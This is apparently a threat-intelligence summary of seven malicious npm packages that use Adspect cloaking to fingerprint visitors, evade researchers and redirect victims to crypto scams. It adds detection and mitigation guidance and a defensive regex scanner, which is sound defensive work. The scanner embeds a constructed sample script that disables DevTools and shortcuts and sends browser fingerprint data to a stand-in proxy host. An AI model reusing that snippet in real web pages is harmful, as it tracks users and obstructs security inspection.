Full Report
Seven packages published on the Node Package Manager (npm) registry use the Adspect cloud-based service to separate researchers from potential victims and lead them to malicious locations. [...]
Analysis Summary
# Tool/Technique: Malicious NPM Packages Abusing Adspect Redirects
## Overview
Seven malicious packages published on the Node Package Manager (npm) registry use the Adspect cloud-based service as part of an obfuscation and redirection scheme. The primary goal is to direct legitimate victims to cryptocurrency scam sites while showing benign content to security researchers attempting analysis.
## Technical Details
- Type: Malware/Technique (Supply Chain Compromise via Malicious Packages)
- Platform: JavaScript/Node.js environment (npm packages executed in web applications)
- Capabilities: Visitor fingerprinting, anti-analysis checks, redirection to malicious infrastructure.
- First Seen: Shortly before November 17, 2025 (Packages published between September and November).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1195 - Supply Chain Compromise
  - T1195.002 - Compromise Software Supply Chain
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1057 - Process Discovery
  - T1497 - Virtualization/Sandbox Evasion (Implicit via anti-analysis checks)
## Functionality
### Core Capabilities
- **Code Execution:** Malicious code packaged within npm modules executes automatically upon page load via an Immediately Invoked Function Expression (IIFE).
- **Visitor Fingerprinting:** Gathers extensive browser and environmental data (User Agent, host, referrer, URI, query string, protocol, language, accepted content types) to create a visitor profile.
- **Redirection:** Sends fingerprinting data to a threat actor proxy, retrieves the victim's real IP, and forwards the data to the Adspect API for classification.
### Advanced Features
- **Adspect Cloaking:** Leverages the Adspect service to differentiate between legitimate targets and security researchers based on environmental data.
- **Anti-Analysis:** Implements specific checks to hinder security inspection:
  - Blocking right-click functionality.
  - Blocking keyboard shortcuts (F12, Ctrl+U, Ctrl+Shift+I).
  - Detecting and triggering a page reload if browser DevTools are identified.
- **Payload Delivery:**
  - **Target Victims:** Redirected to cryptocurrency scam sites (e.g., Ethereum, Solana themed CAPTCHA pages), followed by opening an Adspect-defined URL in a new tab disguised as a user action.
  - **Security Researchers:** Served a fake, benign Offlido company webpage to reduce suspicion and detection.
## Indicators of Compromise
- File Hashes: N/A (Specific hashes not provided in context)
- File Names: The seven malicious packages: `signals-embed`, `dsidospsodlks`, `applicationooks21`, `application-phskck`, `integrator-filescrypt2025`, `integrator-2829`, `integrator-2830`.
- Registry Keys: N/A
- Network Indicators: Use of the **Adspect API** for classification and redirection.
- Behavioral Indicators: Automatic execution via IIFE on load; attempt to disable browser debugging tools (F12 detection); redirection sequences initiated upon classification.
## Associated Threat Actors
The packages were published under the developer name **'dino_reborn'** (email: geneboo@proton[.]me). The ultimate goal involves directing victims to cryptocurrency scam sites.
## Detection Methods
- **Signature-based detection:** Signatures targeting the unique 39kB cloaking code snippet or the specific package names/developer handle.
- **Behavioral detection:** Monitoring for scripts that immediately attempt to disable common browser debugging features (right-click context menu suppression, F12 key monitoring) upon JavaScript execution. Monitoring for unexpected browser interaction masking (opening new tabs disguised as user action).
- **YARA rules if available:** N/A
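The behavioral indicators above (context-menu suppression, F12 and Ctrl-shortcut interception, DevTools-triggered reloads, fingerprint exfiltration and a `_blank` redirect) can be turned into a simple static scan of a package's bundled JavaScript. The scanner below is an added example written for this summary, not code from the Socket report or from the packages it names; the indicator list, weights, threshold and both sample scripts are constructed for illustration.

```javascript
// Heuristic static scanner for the anti-analysis / redirection traits described
// in the summary. Indicators, weights and the threshold are constructed choices.
const INDICATORS = [
  { id: 'iife-on-load',      weight: 1, re: /(?:^|[;\n])\s*\(\s*(?:async\s+)?function\b/m },
  { id: 'contextmenu-block', weight: 2, re: /['"]contextmenu['"]/ },
  { id: 'f12-intercept',     weight: 2, re: /['"]F12['"]|keyCode\s*===?\s*123/ },
  { id: 'ctrl-shortcuts',    weight: 1, re: /ctrlKey[\s\S]{0,80}?(?:shiftKey|['"][uUiI]['"])/ },
  { id: 'devtools-reload',   weight: 2, re: /outerWidth[\s\S]{0,20}innerWidth|location\.reload\s*\(/ },
  { id: 'fingerprint',       weight: 1, re: /navigator\.userAgent|document\.referrer/ },
  { id: 'beacon',            weight: 1, re: /\bfetch\s*\(|XMLHttpRequest|sendBeacon/ },
  { id: 'newtab-redirect',   weight: 2, re: /window\.open\s*\([^)]*['"]_blank['"]/ },
];

// Scan one script's source text; any single trait is common in legitimate code,
// so the verdict is based on several traits co-occurring (weighted score).
function scanScript(source) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (ind.re.test(source)) { hits.push(ind.id); score += ind.weight; }
  }
  return { hits, score, verdict: score >= 6 ? 'suspicious' : 'clean' };
}

// Constructed sample that mimics the described traits (not the real package code).
const CLOAKER_SAMPLE = `
(function () {
  document.addEventListener('contextmenu', function (e) { e.preventDefault(); });
  document.addEventListener('keydown', function (e) {
    if (e.key === 'F12' || (e.ctrlKey && e.key === 'u') || (e.ctrlKey && e.shiftKey && e.key === 'I')) e.preventDefault();
  });
  setInterval(function () {
    if (window.outerWidth - window.innerWidth > 160) location.reload();
  }, 1000);
  fetch('https://proxy.invalid/classify', { method: 'POST',
    body: JSON.stringify({ ua: navigator.userAgent, ref: document.referrer }) })
    .then(function (r) { return r.json(); })
    .then(function (d) { window.open(d.url, '_blank'); });
})();
`;
// Constructed benign module for comparison.
const BENIGN_SAMPLE = `
module.exports = function add(a, b) { return a + b; };
`;

console.log('cloaker:', JSON.stringify(scanScript(CLOAKER_SAMPLE)));
console.log('benign: ', JSON.stringify(scanScript(BENIGN_SAMPLE)));
```

Run it against each file in a package's `dist/` or `main` entry before allowing it into a build; the regexes are intentionally loose and will miss minified or string-encoded variants, so treat a hit as a prompt for manual review rather than a verdict.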
## Mitigation Strategies
- Strict dependency scanning and vulnerability management targeting npm packages for known malicious patterns or unexpected code execution upon installation/load.
- Implementing security policies that limit website interaction hijacking mechanisms.
- Disabling automatic execution of downloaded third-party scripts where possible, or running them in sandboxed environments.
- Monitoring for unusual outbound network traffic to external services (like Adspect) originating from application initialization code.
## Related Tools/Techniques
- Ad-hoc cloaking/fingerprinting scripts leveraging legitimate third-party services (like Adspect) for blending in or evading sandbox analysis.
- Previous npm supply chain attacks that utilized obfuscation libraries.